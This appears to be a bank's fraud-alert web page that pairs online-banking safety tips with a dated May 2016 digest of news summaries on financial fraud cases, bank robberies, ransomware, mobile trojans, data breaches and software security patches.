Fraud Alert Message Center

Tips for Safe Banking Over the Internet

As use of the Internet continues to expand, more banks are using the Web to offer products and services or otherwise enhance communications with customers.

The Internet offers the potential for safe, convenient new ways to shop for financial services and conduct banking business, any day, any time. However, safe banking online involves making good choices - decisions that will help you avoid costly surprises or even scams.

Current Online Threats

Please be aware of any email you receive from the following organizations: FDIC, FFIEC, NACHA, EPCOR, the Federal Reserve, and the Better Business Bureau. None of these organizations should ever send you unsolicited emails regarding your bank or your bank accounts. If you receive an email purporting to be from any of the above organizations, or any other email you are unsure about, do not open it. The email could potentially contain a virus or malware.

For more information regarding email and phishing scams, please visit: http://onguardonline.gov/

Online Shopping Tips for Consumers (separate information page).

ATM and Gas Pump Skimming Information (separate article).

5/26/16

Elderly ex-con arrested for alleged $5M fraud scheme. Texas officials announced May 24 that a former executive at AG Cooper & Associates was arrested and indicted the week of May 16 on charges alleging that the executive orchestrated a wire and mail fraud scheme that bilked over 50 investors out of $5 million by issuing false quarterly statements to investors that indicated their funds were earning over 11 percent in legitimate investments. Officials stated that the executive used the funds for personal use.

The Treasury Department says it has arrested five people in Miami accused of defrauding victims of nearly $2 million by posing as IRS agents and demanding payment of overdue taxes. Officials from the U.S. Treasury Inspector General for Tax Administration announced May 24 that five Cuban nationals were arrested in Miami for their roles in an estimated $2 million fraud scheme in which the group posed as U.S. Internal Revenue Service (IRS) agents in telephone calls and threatened to arrest victims if they did not make an immediate payment of overdue taxes or other fees. Authorities stated that the victims were required to wire transfer the money, a method the IRS does not use.

Fiverr removes DDoS-for-Hire services from its marketplace. Fiverr banned and removed a series of ads reportedly providing distributed denial-of-service (DDoS)-related offerings on its marketplace Web site after security researchers from Incapsula found several DDoS services.

Hackers take over thousands of Twitter accounts and tweet out adult content. Symantec discovered that over 2,500 Twitter accounts were compromised after hackers took over Twitter profiles, changed each user’s avatar picture, and sent out links to adult Web sites or Web cam sites, using Uniform Resource Locator (URL) shorteners, primarily Bit.ly, to hide links to adult Web sites carrying referral tags.

Unpatched flaws plague Moxa connectivity products. The Industrial Control Systems Cyber Emergency Response Team (ICS-CERT) and an independent security researcher discovered that Moxa’s MiiNePort E1, E2, and E3 device models were plagued with at least three serious vulnerabilities including a weak credentials management issue, a clear text password issue, and a cross-site request forgery (CSRF) flaw. The devices are used in the commercial facilities sector, critical manufacturing sector, the energy sector, and the transportation sector.

After record high numbers, a lot of people still don’t know what ransomware is. Kaspersky released a report after studying over 5,000 users in the U.S. and Canada which revealed that 43 percent of the users studied were unfamiliar with ransomware and were unaware that they could lose critical data after such infections. This lack of awareness explains why many users do not know how to respond to a ransomware infection.

5/24/16

Columbia man guilty of federal bank, loan fraud. A former employee at Scott Credit Union in Illinois pleaded guilty May 19 to Federal charges after he defrauded the credit union out of $12 million by embezzling credit union funds, creating fraudulent loans, paying loans through the misapplication of funds from other loans, and increasing credit limits on loans that did not have board approval, among other fraudulent actions, from November 2005 – December 2014. Officials stated the man also knowingly submitted a fraudulent report for the third quarter of 2014 that misstated loan balances, omitted loan amounts, and severely underreported loans.

Exploit for recently patched Flash flaw added to Magnitude EK. A French security researcher discovered that attackers had integrated into the Magnitude exploit kit an exploit for a recently patched Flash Player flaw, targeting previously patched Flash Player 21.0.0.213 installations, to potentially deliver various pieces of malware, including the Locky and Cerber ransomware. The exploit was not yet fully implemented in Magnitude, and researchers advised users to be cautious of it.

Ransomware adds DDoS capabilities to annoy other people, not just you. Security researchers from Invincea reported that the Cerber ransomware was discovered to have a new payload capability to flood a network subnet with packets, a capability characteristic of distributed denial-of-service (DDoS) botnets. The ransomware was detected by 37 of 57 antivirus engines and spreads via weaponized rich text format (RTF) files.

Crooks used SQL injections to hack Drupal sites and install fake ransomware. The chief executive officer (CEO) and co-founder of Forkbombus Labs reported that attackers were leveraging a structured query language (SQL) injection vulnerability in installations of the Drupal 7.x content management system (CMS) prior to version 7.32 to compromise Web sites and install Web-based ransomware. The attackers scanned for the Drupal site version, exploited the flaw to break into affected Web sites, and changed the admin user’s password.

5/23/16 

SEC announces insider trading charges in case involving sports gambler and board member. The U.S. Securities and Exchange Commission announced insider trading charges May 19 against a professional sports gambler and a former board member at Dean Foods Company after the board member allegedly provided the gambler with advance information about Dean Foods including market-moving events, and company earnings statements from 2008 – 2012, among other information regarding Darden Restaurants stocks, which the gambler used to make $40 million in illegal profits. Officials stated the duo used prepaid cell phones and other methods to conceal the illicit activity, and convinced a professional athlete to trade the food company’s securities to pay off a gambling debt. 

60 percent of Androids exposed by new attack on mediaserver. A security researcher from Duo reported that about 60 percent of enterprise Android phones running Lollipop version 5 operating system (OS), KitKat version 4.4, and Marshmallow version 6 OS were susceptible to a Qualcomm Secure Execution Environment (QSEE) vulnerability after researchers discovered the flaw in the mediaserver component that could allow an attacker to gain complete control over the device by tricking users into installing a malicious app. 

Researcher wins $5,000 for finding two ways to brute-force Instagram accounts. Facebook fixed two security flaws on its social network Instagram that could have allowed an attacker to execute brute-force attacks and gain control over users’ accounts due to Instagram’s weak password policy, its use of incremental user identifiers, and its lack of proper rate limiting protection.

Vulnerabilities found in Siemens SIPROTEC protection relays. Security researchers from Siemens and the Industrial Control Systems Cyber Emergency Response Team (ICS-CERT) discovered SIPROTEC 4 and SIPROTEC Compact devices were plagued with several information disclosure vulnerabilities that can allow attackers to obtain sensitive device information if they gain access to the network hosting the devices. Siemens released updates for firmware version 4.27, but has yet to release updates for other relays.

5/20/16 

‘Hipster Bandit’ robs bank minutes after failed attempt. Authorities are searching for a man dubbed the “Hipster Bandit” who is suspected of robbing a Union Bank branch and attempting to rob a Wells Fargo Bank branch in Oceanside, California, May 18. The man is suspected of robbing at least four other banks in San Diego County since July 2015. 

Naples man pleads guilty to defrauding insurance companies. A Naples man pleaded guilty May 18 to Federal charges after the man and co-conspirators ran five unlicensed chiropractic clinics that received over $2 million in fraudulent insurance payments from car insurance companies by soliciting people to participate in staged vehicle accidents in exchange for compensation, and coaching the patients involved in the scheme to receive unneeded treatment. Officials stated the group used a shell corporation to conceal the proceeds from the fraudulent insurance claims, and four other people were charged for their roles in the scheme.

ATMs targeted with improved “Skimer” malware. Researchers at Kaspersky Lab discovered a new version of an ATM malware dubbed “Skimer” that allows attackers direct interaction with ATMs by inserting two types of cards with specially crafted Track 2 data into the infected machine: one designed to execute commands hardcoded in Track 2, while the other allows attackers to launch 1 of 21 predefined commands using the personal identification number (PIN) pad and the malware interface to dispense money from the machine, collect the details of cards inserted, and print the information collected from cards. Researchers stated attackers can use the malware interface to delete the malware, debug it, and update it with code stored on the special card.

A quarter of all hacked WordPress sites can be attributed to three plugins. Sucuri conducted an investigation of 11,485 compromised Web sites and released its “Website Hacked Report,” which revealed that during the first 3 months of 2016, 78 percent of hacked Web sites were using the WordPress Content Management System (CMS) platform, and found that attackers were primarily using outdated plugins to hack WordPress sites. The outdated plugins included RevSlider, GravityForms, and TimThumb, while officials concluded that only 56 percent of all WordPress sites were running outdated WordPress core versions.

TeslaCrypt ransomware project appears to shut down, offers free decryption key. Security researchers from ESET found that the TeslaCrypt ransomware operation was being shut down and that the operators of the ransomware agreed to offer a master decryption key for all victims infected with TeslaCrypt v3 and v4, after a researcher contacted the ransomware operators through the support channel of the ransom Web site hosted on the Dark Web.

Cyber attackers target US presidential campaigns: Official. The DHS and the FBI are investigating cyberattacks against the campaigns of the U.S. presidential candidates after the director of the U.S. National Intelligence Council reported there were indications that revealed cyber attackers were targeting both the Democratic and Republican representatives. Officials stated the attacks could range from defacement to intrusion. 

Macro malware makes improvements on hiding malicious code. Security researchers from Microsoft’s Malware Protection Center discovered a new variation of the Donoff macro malware had evolved to avoid detection after finding that the malware was disseminated via spam email campaigns with attachments made to look non-malicious. The attachments contain seven Visual Basic for Applications (VBA) modules with an encrypted string in the Caption field for CommandButton3 and an unusual code in Module2. 

117M LinkedIn passwords leaked. LinkedIn officials reported May 18 that an additional 117 million LinkedIn users’ emails and passwords were compromised, after attackers were discovered May 16 selling the information on the Dark Web, following a 2012 breach in which a hacker named “Peace” gained unauthorized access and compromised more than 6 million users’ accounts. The social network reported that the additional compromised accounts were not the result of a new security breach and that it was working to apply a password reset to potentially compromised accounts.

5/19/16 

Fraud alert: Card skimmers discovered at 4 Greenville First Citizens Bank ATM locations. Authorities are searching May 17 for the persons responsible for installing card skimmers at four different First Citizen Bank ATM locations in Greenville, North Carolina, after a bank employee discovered one of the malicious card readers during an ATM inspection. Police and First Citizen Bank staff were monitoring account activity for suspicious transactions. 

Guilty plea in multi-million-dollar Ponzi scheme. A Minnesota resident pleaded guilty May 17 to running a $250 million Ponzi scheme where the man used his business, Minnesota Print Services Inc., to defraud investors by claiming he had printing contracts with major corporations and needed cash upfront to receive discounts on purchasing paper, causing investors in 7 States up to $54 million in losses. Officials stated the man used the investors’ funds for personal expenses. 

‘BDL’ bandit robs Warrensville Heights bank. FBI authorities are searching for a man dubbed the “BDL Bandit” who is suspected of robbing five banks including the First Merit Bank in Warrensville Heights, Ohio, May 17. Authorities stated the suspect is considered armed and dangerous. 

Minnesota woman pleads guilty to faking husband’s death for insurance money. A Minnesota woman pleaded guilty May 16 to defrauding Mutual of Omaha Insurance Company out of more than $2 million in life insurance proceeds by falsely claiming her ex-husband’s death after she identified the remains of a body in Moldova as her former husband. Officials stated the woman recruited a third party to open a U.S. bank account and transferred $1.5 million of the insurance proceeds to her son’s account, from which the money was then transferred to bank accounts in Switzerland and Moldova from March 2012 – January 2015.

Cisco patch blocks DoS vulnerability. Cisco released patches for its Adaptive Security Appliance (ASA) software after security researchers found attackers could alter a memory block, causing the system to stop forwarding traffic and creating a denial-of-service (DoS) condition. The flaw was reportedly linked to an issue in the handling of Internet Control Message Protocol (ICMP) error messages for Internet Protocol Security (IPsec) packets.

Windows malware tries to avoid 400 security products. A senior security researcher at enSilo reported that the Furtim malware was seen avoiding security detection, as the malware searches the infected machine for registry entries or service executable names belonging to 400 security products, including rare security products, virtualization environments, and sandboxing products. Once the malware detects a security product, it terminates itself and leaves the computer unharmed, avoiding any type of detection.

Researcher wins $5,000 for finding XSS bug on Google in most peculiar manner. A security researcher from ERNW found a “sleeping stored” cross-site scripting (XSS) vulnerability in Google’s Cloud Console product which could allow an attacker to create a project with a payload in its name and leave it on the dashboard, tricking an administrator into deleting the unknown project and triggering the exploit. Google was made aware of the exploit.

5/18/16 

Ukrainian hacker admits stealing business press releases for $30M gain. A Ukrainian citizen pleaded guilty May 16 to Federal charges for his role in a $30 million hacking scheme in which, from 2010 – 2015, the man and 9 co-conspirators hacked into PR Newswire, Business Wire, and Marketwired to get advance notice of over 150,000 companies’ earnings statements, and sold the insider information for tens of thousands of dollars to traders who executed deals to buy or sell stocks based on the stolen, not-yet-released information. Officials stated that once the transactions were complete, the traders shared the illegal profits with the hackers through foreign shell companies.

Possible security breach at local bank has customers concerned. Southern Michigan Bank and Trust alerted its customers May 6 to a possible security breach targeting the bank chain after a company laptop containing sensitive information including customers’ names, addresses, and account numbers, among other data, was stolen from a vehicle owned by the company’s operations manager in April. Bank officials stated the laptop is password protected and there have been no indications of an active breach of sensitive information. 

Critical vulnerability in Symantec AV Engine exploited by just sending an email. Symantec updated its Antivirus Engine (AVE) addressing a critical memory corruption flaw after a security researcher from Google Project Zero discovered the flaw affected most Symantec and Norton-branded antivirus products and reported the issue related to how the antivirus products handle executables compressed in the ASPack file compressor. The vulnerability can be remotely exploited for code execution by sending a specially crafted file to the victim. 

Apple patches flaws in iOS, OS X, other products. Apple released iOS 9.3.2 for its mobile operating system along with updates for its OS X, iTunes, Safari, tvOS, and watchOS products, patching 39 flaws, after security researchers from Google, Trend Micro, and Context Information Security, among other security companies, found a way to bypass the lockscreen on the iPhone 6s and access photos and contacts by using Siri to conduct an online search for email addresses via Twitter.

Million-Machine botnet manipulates search results for popular search engines. Security researchers from Bitdefender reported that a click-fraud botnet, Million-Machine can modify Internet Explorer proxy settings and add a Proxy Auto Configuration (PAC) script to hijack all Web traffic through a local proxy server and view all Web traffic originating from the personal computer (PC) via infected downloadable versions of popular software programs including WinRAR, YouTube Downloader, and Connectify, among other products. The malware’s dissemination was assisted by the Redirector.Paco botnet that modifies a computer’s local registry keys with two entries disguised as Adobe products to make the Million-Machine malware begin its operations after each PC restart. 

Chrome to deprecate Flash in favor of HTML5. The technical program manager at Google (Chrome) reported that they will only allow Flash Player execution if a user has indicated that the domain should execute the program and will begin to implement an “HTML5 by Default” policy on its Chrome Web browser by Quarter 4 (Q4) 2016. Chrome will introduce the new feature with a temporary whitelist of the current top Flash Player Web sites, which will expire after one year. 

Attackers deliver latest Flash exploit via malicious documents. Security researchers from FireEye reported that an exploit for a type confusion flaw, previously patched by Adobe, was being disseminated via Uniform Resource Locator (URL) or email attachment after attackers embedded the Flash Player exploit inside Microsoft Office documents, hosted the documents on their own Web server, and used a Dynamic DNS (DDNS) domain to reference the document and payload.

5/17/16 

Upgraded Android banking trojan targets users in 200 countries. Security researchers from Doctor Web reported that an Android banking trojan dubbed Android.SmsSpy.88.origin, initially discovered in 2014, was updated with new ransomware capabilities, including a credit card information stealing capability that targets around 100 banking applications by using WebView to display a phishing window on top of the legitimate banking app, and by utilizing a fake Google Play payment phishing page, and can intercept and send short message service (SMS) and multimedia messaging service (MMS) messages, send unstructured supplementary service data (USSD) requests, and transmit all saved messages to the server, among other malicious actions. Security researchers stated the trojan has infected over 40,000 devices in over 200 countries.

M&T Bank settles Federal fraud case for $64 million. M&T Bank Corporation agreed May 13 to pay the Federal government $64 million to settle charges after a former underwriter at M&T filed a whistleblower lawsuit against the bank in 2013 alleging she witnessed fraud in the bank’s Federal Housing Administration underwriting practices, prompting a Federal investigation which revealed that the bank awarded housing loans that did not meet Federal requirements. 

SEC charges two attorneys with defrauding escrow clients. The U.S. Securities and Exchange Commission announced May 13 fraud charges against two attorneys acting as escrow agents after the duo allegedly made undisclosed risky investments and stole $13.8 million they obtained in escrow amounts from small business owners by making misrepresentations to clients about a purported loan company, Atlantic Rim Funding, siphoning clients’ investment funds to pay themselves and others, and gambling on risky securities derivatives. Officials stated the pair concealed their illicit actions by claiming the money used for the securities trades was their own and did not belong to clients. 

Data leaked from hacker forum Nulled.io. Risk Based Security reported that the popular forum Nulled.io was compromised after hackers leaked a 1.3 GB archive containing records for more than 536,000 user accounts, including usernames, email addresses, hashed passwords, application program interface (API) credentials for payment gateways, authentication logs, and Internet Protocol (IP) addresses, among other data. Researchers are unsure how the Nulled.io database was compromised, and the forum was taken offline due to the attack.

New Simple attack on Squid proxies leverages malicious flash ads. Squid released versions 4.0.10 and 3.5.18 addressing a vulnerability in its products after a graduate from Tsinghua University discovered a vulnerability dubbed Squison in Squid 3.5.12 to 3.5.17 and all 4.x versions up to 4.0.9 that could allow hackers to poison a Squid proxy server’s cache with malicious content by using simple attacks including a malicious Flash ad or through a Web site controlled by an attacker. 

Researchers crack new version of CryptXXX ransomware. Researchers from Kaspersky Lab created a new tool titled RannohDecryptor that will help victims decrypt files and recover information affected by the CryptXXX 2.0 malware. Researchers advised users to install software updates to mitigate ransomware attacks.

Silk Road 3.0 pops up on the Dark Web, once again. A Reddit online thread reported that a new Silk Road marketplace dubbed Silk Road 3.0 was active after its predecessor site was shut down following an FBI raid that led to the arrest of the Web site’s users, moderators, and administrator. The marketplace was seen actively compiling stolen data, exploits, botnets, drugs, and weapons, among other illegal items, for attackers to purchase.

Five-year-old SAP vulnerability affects over 500 companies, not 36. The U.S. Computer Emergency Response Team (US-CERT) issued a public alert to all U.S. companies after ERPScan discovered at least 533 companies were affected by an SAP vulnerability largely due to the companies’ failure in installing a SAP security patch issued in 2010. The vulnerability can allow attackers to gain complete control of SAP business platforms via a bug in Invoker Servlet, a component in SAP’s Java platforms. 

Meteocontrol patches flaws in Photovoltaic Data logger. Meteocontrol released an update for all versions of its WEB’log Basic 100, Light, Pro, and Pro unlimited products used in the energy, water, critical manufacturing, and commercial facilities sectors after a security researcher discovered that the products were plagued by critical authentication flaws, information exposure flaws, and a cross-site request forgery (CSRF) flaw that could allow attackers to perform actions on behalf of the user without authentication and access an administrator password in clear text.

5/16/16

SWIFT warns of malware attack on another customer. The Society for Worldwide Interbank Financial Telecommunication (SWIFT) warned customers May 13 against a second malware attack discovered at a bank using its services that targeted customer banks’ secondary security controls by modifying the bank’s PDF reader with malicious software to conceal the fraudulent transactions in PDF reports of payment confirmations. Attackers also exploited vulnerabilities in the bank’s systems in order to initiate fund transfers, steal credentials, and use them to send irrevocable fund transfer orders via the SWIFT network.

RushCard to pay $19 million to users for last year’s outage. RushCard agreed to pay at least $19 million to compensate its users impacted by an October 2015 service outage after the company attempted to switch payment processors, which caused tens of thousands of RushCard accounts to freeze leaving customers without access to their money for as long as 2 weeks. According to the agreement, the company will pay each customer who could not access their funds at least $100, and up to $500 to individuals who can document any losses incurred due to the outage.

Former worker pleads guilty in $626,941 bank embezzlement case. The former president of People’s Savings Bank in Crawfordsville, Iowa, pleaded guilty May 9 to embezzling $626,941 from the bank after he created multiple straw loans involving existing bank customers and stole the loan proceeds from December 2002 – March 2013. Officials stated the former executive also received unauthorized bonuses and salary increases from January 2008 – October 2013.

Adobe patches Flash zero-day exploited in the wild. Adobe updated its Flash Player for Microsoft Windows, Apple Mac, and Linux addressing 25 vulnerabilities including a type confusion, use-after-free, buffer overflow, directory search path, various memory corruption vulnerabilities that can lead to arbitrary code execution, and a zero-day that has been exploited in the wild.

7-Zip 16.0 released to fix gaping security hole. The 7-Zip project released version 16.0 of its open-source (de)compression software, patching two critical vulnerabilities discovered by Cisco’s Talos team, a heap overflow vulnerability and an out-of-bounds read vulnerability, both due to an issue with how the 7-Zip client handles Universal Disk Format (UDF) files. Attackers can create a booby-trapped 7-Zip archive containing a malicious file that initiates the attack when a client unzips it.

5/13/16

FBI: Serial ‘Ballcap Bandit’ bank robbery suspect strikes again. Authorities are searching May 11 for a man dubbed the “Ballcap Bandit” who is suspected of robbing a Wells Fargo Bank branch in Falls Church, a Wells Fargo Bank branch in Alexandria, and a SunTrust Bank branch in Del Ray, Virginia, since April. Authorities were unsure if the suspect is armed.

Former Savannah CEO pleads guilty to $9M bank fraud. The former chief executive officer (CEO) and president of Central Bank in Savannah, Tennessee, pleaded guilty May 11 to Federal fraud charges after he made unauthorized advances to Tennessee Materials Corp., (TMC) and allowed TMC to deposit 161 insufficiently funded checks to cover overdraft balances in the company’s account from 2009 – 2012, causing Central Bank, Wayne County Bank, and First Metro Bank more than $9 million in losses. Officials stated the bad checks created false balances in TMC’s account, enabling the company to use approximately $3.9 million that belonged to Central Bank without the bank’s knowledge or approval.

Region 8 women plead guilty to bank fraud of nearly $4 million. Officials from the U.S. Attorney’s Office for the Eastern District of Arkansas and the FBI announced May 11 that three employees at the First National Bank of Lawrence County pleaded guilty to embezzling more than $3.9 million from the bank from 2005 – 2015. Officials stated that the trio received advance notice of internal audits, and would temporarily transfer money from other branches of the bank into the main vault to conceal their theft from auditors.

Google patches more high risk vulnerabilities in Chrome 50. Google released a round of security patches for Chrome 50 addressing five vulnerabilities, three of which were deemed high severity: a same origin bypass issue in the Document Object Model (DOM), a same origin bypass bug in Blink V8 bindings, and a buffer overflow flaw in V8. A directory traversal flaw using the file scheme on Android and a race condition bug in the loader were also patched, among other vulnerabilities.

SAP patches critical vulnerabilities in Enterprise products. SAP released 10 Security Patch Day Notes and 11 Support Package Notes fixing 10 vulnerabilities, mainly in its NetWeaver Advanced Business Application Programming (ABAP) platform and Java, including critical flaws in Adaptive Server Enterprise (ASE) XPServer, Crystal Reports for Enterprise, and Predictive Analytics, which could allow an attacker to execute commands remotely without authorization, obtain critical technical and business-related information, or gain unauthorized access and perform actions in the system.

5/12/16 

Guilty plea in $250M pump-and-dump scheme. The owner of a broker-dealer and investment management firm based in Panama and Belize pleaded guilty May 9 to running a $250 million pump-and-dump scheme where he and co-conspirators convinced U.S. investors to buy stock in over 40 thinly-traded public companies by falsely touting and inflating the share values, and established shell companies to circumvent U.S. Internal Revenue Service (IRS) tax reporting requirements from 2010 – 2014. Officials stated that the broker and his co-conspirators dumped their shares at inflated rates and used corrupt law firms to launder the fraudulent proceeds. 

Prominent Manhattan landlord arrested. A Manhattan landlord was arrested and charged May 9 after he allegedly secured more than $45 million in fraudulent mortgage loans by inflating rental and other income from his Manhattan residential buildings, and submitting fraudulent mortgage documents to banks. The New York State Attorney General’s office also filed parallel civil charges against the landlord after he and his staff drove tenants from their rent-regulated apartments by creating dangerous and unlivable conditions, filing frivolous lawsuits, and offering buyouts. 

Wi-Fi flaw exposes Android devices to attacks. Google and the developers of the Wi-Fi Protected Access (WPA) supplicant, which is used in the Android operating system (OS) and several other products, patched a high severity privilege escalation flaw after SEARCH-LAB researchers determined that the vulnerability can be exploited to write arbitrary values into the wpa_supplicant configuration file, allowing an attacker to execute arbitrary code with elevated privileges or disrupt the device’s Wi-Fi functionality. The weakness is exploited through a Wi-Fi Protected Setup (WPS) attack or the wpa_supplicant control interface.

Microsoft patches flaws exploited in targeted attacks. Microsoft released 16 security bulletins patching over 30 flaws exploited via Internet Explorer, Windows, and Office which address JavaScript and Visual Basic Scripting Edition (VBScript) zero-days, several remote code execution (RCE) vulnerabilities in Edge running on Windows 10, and a Transport Layer Security (TLS) vulnerability, among others. 

Syrian Electronic Army hacker extradited to U.S. A suspected member of the Syrian Electronic Army hacktivist group was extradited from Germany to the U.S. to face charges that he and two other alleged members took part in a criminal conspiracy related to their campaign which involved targeting and hacking into the systems of government organizations, media companies, and other private-sector entities. 

DHS moves to bolster intrusion/detection for Federal networks. DHS released its Privacy Impact Assessment and announced the addition of a new intrusion prevention security service to its National Cybersecurity Protection System (NCPS), dubbed Einstein 3A, a Web Content Filtering system that provides protection at the application layer for Web traffic by blocking access to suspicious sites and works to prevent, detect, and block malware from running on systems and networks.

Adobe warns of Flash zero day, patches Acrobat, Reader. Adobe issued 95 fixes for Acrobat, Reader, and ColdFusion addressing use-after-free vulnerabilities, memory corruption flaws that could lead to code execution, heap buffer overflow vulnerabilities, and several other flaws that could result in information disclosure or memory leak. A patch for a zero day vulnerability in Flash Player which could cause a crash and allow an attacker to take control of the system is expected to be released the week of May 9.

5/11/16 

Four charged in alleged central Kentucky bank fraud involving $40 million. A loan officer and three others were indicted on Federal charges May 9 after the group, operating as various businesses, allegedly defrauded several central Kentucky banks out of more than $40 million in loans or loan renewals by making false representations or omissions on loan documents to banks in Fayette, Woodford, and Harrison counties from May 2006 – September 2010. Officials stated that the group used the loans for purposes other than those listed in the application. 

Android trojan steals credit card info, locks devices remotely. Researchers from Avast discovered a new Android banking trojan that is capable of spying on users and stealing credit card information by gaining admin rights to a victim’s device after continuously prompting the Device Admin activation dialog until the user grants the malware admin rights, while hiding the app icon following the program’s first run. Researchers stated that the trojan is designed to send information about the device to a command and control (C&C) server, intercept incoming short message service (SMS) messages and send them to the server, and receive further commands from its operators. 

SS7 attack leaves WhatsApp and Telegram encryption useless. Positive Technologies researchers unveiled a new attack that utilizes Signaling System No. 7 (SS7) to carry out attacks on encrypted communications apps such as WhatsApp and Telegram by spoofing a mobile network node and intercepting the initial phase of a chat between two users. The researchers were able to impersonate a second user through SS7 loopholes that were never patched. 

CryptXXX is now undecryptable, prevents users from accessing their PC. Researchers at Proofpoint discovered CryptXXX version 2.006, an update to CryptXXX, which defeats a Kaspersky Lab decrypter, blocks users from going online, and locks a user’s entire screen, forcing them to log onto a different computer to go online to buy Bitcoin and pay the ransom. The ransomware is distributed via malvertising campaigns, malicious ads on legitimate Web sites, or through an intermediary malware called Bedep.

5/10/16 

Israel approves extradition to U.S. of two securities fraud suspects. Officials from Israel’s Ministry of Justice approved May 8 the extradition of two men to the U.S. indicted in the U.S. District Court for the Southern District of New York for their roles in a “pump-and-dump” stock manipulation scheme where the men and co-conspirators acquired shares in thinly traded companies, sent millions of spam emails inducing investors to purchase the stocks in order to artificially inflate the price, then sold off their holdings from 2011 – 2015. Authorities stated that charges were added to the indictment in March after discovering that the duo hacked into a dozen companies’ networks and stole the personal information of more than 100 million people. 

Over two dozen flaws found in Aruba products. Aruba Networks patched some of the 26 security flaws discovered by a Google security engineer, and is working to patch the remaining vulnerabilities which impact all versions of ArubaOS, AirWave Management Platform 8.x versions prior to 8.2, and Aruba Instant access points (IAP) prior to 4.1.3.0 and 4.2.3.1. Some of the vulnerabilities discovered include the transmission of login credentials via Hypertext Transfer Protocol (HTTP), default accounts, remote code execution flaws, firmware-related weaknesses, information disclosure issues, and Protocol Application Programming Interface (PAPI)-related security bugs. 

Google suffers minor data breach via third-party benefits vendor. Google notified an unknown number of employees following a data breach that occurred when a manager of a third-party benefits vendor sent a file containing the names and Social Security numbers of an undisclosed number of Google employees to the wrong person. The individual who received the data deleted it from his computer and notified Google’s vendor of the incident. 

Bucbi ransomware makes a comeback after two years. Researchers at Palo Alto Networks reported that a cyber-crime group is utilizing a re-tooled version of the Bucbi ransomware that does not rely on social engineering tactics and works without needing to connect to an online command and control (C&C) server, uses a different installation routine, and also employs a different ransom note. The group uses brute-force attacks against corporate networks running Internet-available Remote Desktop Protocol (RDP) servers. 

190 Android apps infected with malware discovered on the Google Play Store. Google removed 190 applications infected with malware from its Google Play Store after it was notified by Dr. Web security researchers, who discovered that the malware, Android.Click, waits 6 hours after installation before forcibly loading a Uniform Resource Locator (URL) in the user’s browser that sends the user back to the Google Play Store to download a second app.

WordPress 4.5.2 released to fix XSS and SOME security bugs. The WordPress project released version 4.5.2 of its open-source platform addressing two security issues in two libraries packed with the content management system (CMS) after Cure53 researchers found a Same-Origin Method Execution (SOME) vulnerability in the Plupload library, which allows attackers to perform unintended actions on a Web site on behalf of victims, and a cross-site scripting (XSS) issue in the MediaElement.js library.

5/9/16 

New trojan targets banks in US, Mexico. Researchers from Zscaler discovered a new information stealer trojan that leverages legitimate tools to target online banking users in the U.S. and Mexico. It is delivered via the “curp.pdf.exe” installer served on several compromised Web sites, which downloads a main payload file, a Fiddler dynamic link library (DLL) file, and a Json.Net DLL file onto a victim’s device to collect system information and send it back to the command and control (C&C) server, parse the server’s response and save the information in an extensible markup language (XML) file, and intercept Hypertext Transfer Protocol (HTTP) and Secure Hypertext Transfer Protocol (HTTPS) connections to redirect users to a malicious Web site masked as a bank’s legitimate domain.

Pair arrested in counterfeit credit card scheme: MDPD. Two men were arrested and charged May 5 after detectives witnessed the duo using counterfeit credit cards to make fraudulent purchases at the Dadeland Mall and stores throughout Miami-Dade County. Authorities stated a subsequent search of one of the suspects’ vehicles revealed 192 counterfeit credit cards. 

Chicago financial adviser pleads guilty to $4.2M fraud. The operator of a Chicago-based investment firm, D.J. Mosier and Associates, pleaded guilty May 5 to defrauding 9 clients out of more than $4.2 million by persuading them to invest in phony “Chicago Anticipatory Notes” debt securities. The financial adviser cashed the investors’ checks into her personal bank account and used the money for personal expenses, and to make bogus interest payments to previous clients.

Android trojan pesters victims, won’t take no for an answer. Avast researchers determined that an information-stealing Android trojan that is inadvertently downloaded by users begins its infection after an icon is installed in the launcher in the name of a fake app, which launches a dialog box that asks the user to grant it admin rights and blocks further access. Users can remove the trojan by powering down the phone and restoring it to factory settings or uninstalling the app.

New security flaw found in Lenovo Solution Center software. Trustwave SpiderLabs reported a new vulnerability in Lenovo’s Solution Center software which is tied to the software’s backend and can allow an attacker with local network access to a PC to execute arbitrary code and elevate privileges. The company updated a previous security advisory disclosing the additional vulnerability and released a fix addressing the vulnerability. 

Ransomware infections grew 14 percent in early 2016, April the worst month. Kaspersky, Enigma Software Group, and the FBI issued a warning to companies about the increase in ransomware infections following reports of at least 2,900 new ransomware variants, representing a 14 percent increase in Quarter 1 of 2016. Researchers also found a significant increase in the number of attacks during April. 

New Attack on WordPress sites redirects traffic to malicious URLs. Security researchers from Sucuri reported that hackers were continuously leveraging vulnerabilities in older WordPress versions or WordPress plugins by altering the Web sites’ main theme’s header.php file via 12 lines of obfuscated code to redirect users to malicious Web sites. In addition, Joomla Web sites were seen with a similar malicious code in the administrator/includes/help.php file. 

Qualcomm software flaw exposes Android user data. Security researchers from FireEye discovered that an open source software package from Qualcomm Technologies, Inc., and devices running Android 5.0 Lollipop and earlier versions, were affected by an information disclosure vulnerability that could allow a malicious application to access user information as long as the application has the “ACCESS_NETWORK_STATE” permission. Qualcomm issued security updates patching the vulnerability.

Adobe issues pre-patch advisory for Reader, Acrobat. Adobe issued a pre-patch advisory stating that it will release patches for its PDF Reader and Acrobat software products May 10, which will address critical vulnerabilities.

5/6/16 

Cisco patches serious flaws in FirePOWER, TelePresence. Cisco released software updates patching several vulnerabilities in its FirePOWER and TelePresence products including a critical vulnerability that allows a remote, unauthenticated attacker to bypass authentication and gain access to a targeted system, as well as several high severity denial-of-service (DoS) vulnerabilities that could allow a remote attacker to cause a system to stop inspecting and processing packets by sending a specially crafted packet. The company stated there was no evidence to suggest the exploits were used for malicious purposes.

Apple updates Xcode to patch Git vulnerabilities. Apple released Git version 2.7.4 and Xcode version 7.3.1, patching several remote code execution (RCE) vulnerabilities affecting Git versions 2.7.3 and earlier, after discovering that attackers could exploit the flaws by pushing or cloning a repository with a large file name or a large number of nested trees on Apple’s operating system (OS) X El Capitan.

Exclusive: Big data breaches found at major email services – expert. The founder and chief information security officer of Hold Security reported that 273.3 million stolen accounts, including Mail.ru, Google, Yahoo, and Microsoft accounts, were being traded in Russia’s criminal underworld after the security firm discovered a Russian hacker dubbed “The Collector” bragging in an online forum about the number of stolen credentials he had collected and was prepared to sell. Many of the stolen usernames and passwords allegedly belong to employees of U.S. banking, manufacturing, and retail companies.

